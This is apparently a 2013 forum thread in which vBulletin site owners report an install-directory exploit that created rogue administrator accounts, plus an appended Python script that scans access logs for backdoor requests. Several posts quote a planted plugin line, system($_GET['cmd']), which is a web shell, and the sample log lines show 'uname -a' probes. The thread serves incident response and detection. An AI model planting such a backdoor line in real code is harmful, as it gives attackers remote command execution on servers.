Received the email notice this morning, logged into my forum, just HAPPENED by sheer luck to see a new registered member "Th3H4ck" and saw they had administrative powers. So I immediately deleted their account, and removed the /install directory on my forum as indicated. The site is not defaced and otherwise appears to be OK.
HOWEVER, I am reading about other members having admin log entries changed and such, how can I verify nothing was changed in the database or put elsewhere? I ran the admincp log and didn't see anything out of normal running back the past several days.
You can see what they were doing by looking in your Statistics & Logs > Control Panel Logs.
I had the same things and did the same steps (removing /install and deleting the three new administrator accounts). Interested to know from the greater community whether anyone has found that anything else was done with these user accounts.
Several of my forums were affected by this exploit, however only one of the forums had activity from the hacked user which was them grabbing the email list.
44237 support 22:27, 3rd Sep 2013 email.php makelist 99.227.104.35
44236 support 22:27, 3rd Sep 2013 email.php genlist 99.227.104.35
Right, I checked there and haven't seen anything, but how deep does this go, were they able to access the database directly, cpanel, etc. etc?
They would need to create a plugin or something to have additional access outside the AdminCP. However once in the AdminCP, that could be possible. You would need to check your plugins to make sure none of them are new or not what you installed.
Wayne Luke
I was hacked this morning...not sure if it was this exploit or not, but I had an admin user that created a default plugin that was an ajax start that did the following:
system($_GET['cmd']);
I've deleted the user...
He replaced my index.php with some text that said "HACKED...Fix yo s**t" only it wasn't censored...From what I can tell, that's the only damage that was done. Is this the kind of activity you would expect from this exploit? Should I submit a ticket to get someone to look into further damages and issues? It looks like the individual was sending a warning or something for us to tighten up on security or something.
I mainly want to make sure I got rid of all the back doors he may have put in. The plugin that had the system command in it existed twice.
There's some other stuff that he did, but I'm not sure how to get the details and what I should look for...here's my admin log:
They would need to create a plugin or something to have additional access outside the AdminCP. However once in the AdminCP, that could be possible. You would need to check your plugins to make sure none of them are new or not what you installed.
My administrative log did not indicate there were any plugins modified/uploaded, and pruning it is locked via the config file. Am I safe to assume nothing else happened then?
Suffering the same sort of hack. A plugin was added to our vB (ajax_complete), which through ajax.php, provided the hacker access to system commands. I've checked the access_log and nothing happened after a "uname -a". Except that another IP address (both IP addresses belong to Leaseweb Netherlands) has accessed the same ajax.php with the same uname command. No other commands have been run through ajax.php. The error_log shows they were trying to mess with the database though, through vb_database_alter, amongst other things.
vB has been cleaned up, IP addresses have been added to the firewall (for what it's worth).
Still, check your access and error logs if you suffered the same. Whatever's been done might go further than the vB control panel logs will show.
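The access-log check recommended in the post above, as an added example that is not part of any post in this thread: it lists every request to ajax.php that carried a `cmd` query parameter (the parameter read by the `system($_GET['cmd'])` plugin quoted earlier), grouped by source IP. The Apache combined log format, the `/forum/` path and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not taken from the thread).
SAMPLE_LOG = """\
203.0.113.10 - - [03/Sep/2013:22:31:02 +0000] "GET /forum/ajax.php?do=usersearch&cmd=uname%20-a HTTP/1.1" 200 412 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Sep/2013:22:40:15 +0000] "GET /forum/ajax.php?cmd=uname+-a HTTP/1.1" 200 412 "-" "curl/7.30"
192.0.2.44 - - [03/Sep/2013:22:41:00 +0000] "POST /forum/ajax.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"
192.0.2.44 - - [03/Sep/2013:22:41:09 +0000] "GET /forum/showthread.php?t=12&cmd=1 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status of one log line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_cmd_requests(log_text, script="ajax.php", param="cmd"):
    """Return {ip: [(timestamp, status, decoded_value), ...]} for requests
    to `script` whose query string carries `param`."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        url = urlsplit(m["target"])
        if not url.path.endswith("/" + script):
            continue  # same parameter name on another script is ignored
        # parse_qs URL-decodes the value, so %20 and + both become a space
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            hits[m["ip"]].append((m["ts"], int(m["status"]), value))
    return dict(hits)

if __name__ == "__main__":
    for ip, events in find_cmd_requests(SAMPLE_LOG).items():
        for ts, status, cmd in events:
            print(f"{ip}  {ts}  HTTP {status}  cmd={cmd!r}")
```

Because that plugin reads `$_GET`, each command sent to it is part of the request line and so appears in the access log for as long as the log is retained; changes made through the AdminCP itself will not show up this way.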